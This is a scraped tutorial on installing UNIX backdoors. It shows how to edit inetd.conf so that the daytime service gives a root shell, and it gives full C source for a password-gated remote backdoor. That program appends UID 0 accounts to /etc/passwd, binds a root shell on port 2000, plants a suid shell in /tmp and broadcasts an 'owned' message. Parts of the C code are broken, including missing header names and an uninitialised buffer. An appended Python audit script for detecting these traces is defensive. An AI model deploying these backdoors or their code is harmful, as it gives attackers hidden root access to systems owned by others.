Create a UNIX backdoor (intermediate)

Source: Internet
Author: User
Tags: password protection

The configuration file of the super server daemon inetd is a place the system administrator generally does not check often. Therefore it is a good place to put a "backdoor". :) So how do you build the best backdoor here? Remote, of course: that way you do not need a local account to become root. First, some basic background: the inetd process listens for connection requests on various TCP and UDP ports and starts the corresponding server process for each request. The configuration file /etc/inetd.conf is very simple. Its basic form is as follows:

(1)       (2)     (3)      (4)     (5)   (6)              (7)
ftp       stream  tcp      nowait  root  /usr/etc/ftpd
talk      dgram   udp      wait    root  /usr/etc/ntalkd
mountd/1  stream  rpc/tcp  wait    root  /usr/etc/mountd

1: The first column is the service name. The service name is mapped to a port number by querying the /etc/services file (for TCP and UDP services) or the portmap daemon (for RPC services). RPC (remote procedure call) services are identified by a service name of the form name/num and the rpc flag in the third column.

2: The second column specifies the socket type used by the service: stream, dgram, or raw. Generally, stream is used for TCP services and dgram for UDP; raw is rarely used.

3: The third column identifies the communication protocol used by the service. The allowed values are listed in the /etc/protocols file; the protocol is almost always tcp or udp. For RPC services the protocol type is prefixed with rpc/.

4: If the service can handle multiple requests in one process (rather than exiting after handling a single request), the fourth column is set to wait; this stops inetd from continuously forking new copies of the daemon, and is used for daemons that handle a large number of small requests. If wait is not appropriate, enter nowait in this field.

5: The fifth column is the username the daemon runs as.

6: The sixth column is the fully qualified path name of the daemon.

7: The seventh column is the daemon's real name and its arguments.

If the work to be done is trivial (no user interaction is required), the inetd daemon handles the request itself; in that case columns 6 and 7 simply contain 'internal'. Therefore, to install a convenient backdoor, pick a service that is rarely used and replace its daemon with one that creates a backdoor, for example by adding an account with UID 0 or copying a suid shell.

One of the better methods is to replace the daytime service, which serves the date and time, with a shell that runs as root. In the /etc/inetd.conf file, change:

daytime stream tcp nowait root internal

to:

daytime stream tcp nowait /bin/sh -i

And remember: you must restart the inetd process:

killall -9 inetd

But a better and more concealed method is to forge a network service that provides a backdoor with password protection, which is even less noticeable. It would be ideal to have easy remote access without going through a telnetd connection. The method is to bind your "own" daemon to a port. The program gives no prompt to external connections; you only need to type the correct password to get into the system. The following is a demonstration program for this backdoor. (Note: this program is not completely written.)

<++> Backdoor/remoteback.c
/* Coders:
        Theft

   Help from:
        Sector9, Halogen

   Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen,
                   Psionic, mongod, Psionic.
           Groups: Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH),
                   Global Hell (gH), Team Sploit, Hong Kong Danger Duo,
                   Tg0d, EHAP.
   Usage:
        Setup:
           # gcc -o backhore backhore.c
           # ./backdoor password &
        Run:
           Telnet to the host on port 4000. After connected you
           will not be prompted for a password, this way it is less
           obvious, just type the password and press enter, after this
           you will be prompted for a command, pick 1-8.

   Distributers:
        Ethical Mutiny Crew

*/

/* header names are missing on the page */
#include
#include
#include
#include
#include
#include
#include
#include


#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int
main(int argc, char *argv[])
{
    int sockfd, new_fd, sin_size, numbytes, cmd;
    char ask[10] = "Command: ";
    char *bytes, *buf, pass[40];
    struct sockaddr_in my_addr;

    struct sockaddr_in their_addr;

    printf("\nBackhore BETA by Theft\n");
    printf("1: trojans rc.local\n");
    printf("2: sends a systemwide message\n");
    printf("3: binds a root shell on port 2000\n");
    printf("4: creates suid sh in /tmp\n");
    printf("5: creates mutiny account uid 0 no passwd\n");
    printf("6: drops to suid shell\n");
    printf("7: information on backhore\n");
    printf("8: contact\n");

    if (argc != 2) {
        fprintf(stderr, "Usage: %s password\n", argv[0]);
        exit(1);
    }

    strncpy(pass, argv[1], 40);
    printf("..using password: %s..\n", pass);


    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {

        perror("bind");
        exit(1);
    }

    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }

    sin_size = sizeof(SA);
    while (1) { /* main accept() loop */
        if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        if (!fork()) {
            dup2(new_fd, 0);
            dup2(new_fd, 1);
            dup2(new_fd, 2);
            fgets(buf, 40, stdin);
            if (!strcmp(buf, pass)) {
                printf("%s", ask);
                cmd = getchar();
                handle(cmd);
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while (waitpid(-1, NULL, WNOHANG) > 0); /* reap exited children */
    }
}


void
handle(int cmd)
{
    FILE *fd;

    switch (cmd) {
    case '1':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Trojaning rc.local\n");
        fd = fopen("/etc/passwd", "a+");
        fprintf(fd, "mutiny:0:0:ethical mutiny crew:/root:/bin/sh");
        fclose(fd);
        printf("Trojan complete.\n");
        break;
    case '2':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Sending systemwide message...\n");
        system("wall Box owned via the Ethical Mutiny Crew");
        printf("Message sent.\n");
        break;
    case '3':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding inetd backdoor... (-p)\n");
        fd = fopen("/etc/services", "a+");
        fprintf(fd, "backdoor\t2000/tcp\tbackdoor\n");
        fd = fopen("/etc/inetd.conf", "a+");
        fprintf(fd, "backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
        execl("killall", "-HUP", "inetd", NULL);
        printf("\ndone.\n");
        printf("telnet to port 2000\n");
        break;
    case '4':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding Suid Shell... (-s)\n");
        system("cp /bin/sh /tmp/.sh");
        system("chmod 4700 /tmp/.sh");
        system("chown root:root /tmp/.sh");
        printf("\nSuid shell added.\n");
        printf("execute /tmp/.sh\n");
        break;
    case '5':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nAdding root account... (-u)\n");
        fd = fopen("/etc/passwd", "a+");
        fprintf(fd, "hax0r:0:0://bin/bash\n");
        printf("\ndone.\n");
        printf("uid 0 and gid 0 account added\n");
        break;
    case '6':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("Executing suid shell..\n");

        execl("/bin/sh");
        break;
    case '7':
        printf("\nBackhore BETA by Theft\n");
        printf("theft@cyberspace.org\n");
        printf("\nInfo... (-I)\n");
        printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
        printf("a root shell on port 2000. example: telnet 2000\n");
        printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
        printf("executed gives you a root shell. example: /tmp/.sh\n");
        printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
        printf("The login is 'mutiny' and there is no passwd.");
        break;
    case '8':
        printf("\nBackhore BETA by Theft\n");
        printf("\nhttp://theft.bored.org\n");
        printf("theft@cyberspace.org\n");
        break;
    default:
        printf("unknown command: %d\n", cmd);
        break;
    }
}
<-->
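Both techniques on this page leave the same traces: an inetd.conf entry whose program is an interactive shell (or a builtin service such as daytime no longer marked internal), and passwd lines with UID 0 or an empty password field. The following audit script is an added example for detecting those traces, not code from the page or its author; the inetd.conf and passwd samples are constructed inline, and in real use you would read /etc/inetd.conf and /etc/passwd instead.

```python
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "/bin/zsh"}
# services inetd normally serves itself; a real program here is a red flag
BUILTIN = {"echo", "discard", "chargen", "daytime", "time"}

def audit_inetd(conf_text):
    """Return [(service, reason)] for inetd.conf entries matching the page's pattern."""
    findings = []
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        cols = line.split()
        if len(cols) < 6:
            findings.append((cols[0], "malformed entry"))
            continue
        service, program = cols[0], cols[5]
        # a shell anywhere from the user column on catches the page's
        # "nowait /bin/sh -i" form, which has no user column at all
        shells = [c for c in cols[4:] if c in SHELLS]
        if shells:
            findings.append((service, "shell bound to port: " + shells[0]))
        elif service in BUILTIN and program != "internal":
            findings.append((service, "builtin service replaced by " + program))
    return findings

def audit_passwd(passwd_text):
    """Return [(login, reason)] for the UID-0 / empty-password accounts the backdoor adds."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        login, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and login != "root":
            findings.append((login, "extra UID 0 account"))
        if pw == "":
            findings.append((login, "empty password field"))
    return findings

# constructed samples, not taken from any real host
SAMPLE_INETD = """# constructed sample
ftp      stream  tcp  nowait  root  /usr/etc/ftpd
echo     stream  tcp  nowait  root  internal
daytime  stream  tcp  nowait  /bin/sh -i
backdoor stream  tcp  nowait  root  /bin/sh -i
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
mutiny::0:0:ethical mutiny crew:/root:/bin/sh
"""

if __name__ == "__main__":
    for finding in audit_inetd(SAMPLE_INETD) + audit_passwd(SAMPLE_PASSWD):
        print("%-10s %s" % finding)
```

The suid shell copy from option 4 is the one trace this script does not cover; a periodic `find / -perm -4000 -type f` compared against a known-good baseline catches it.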
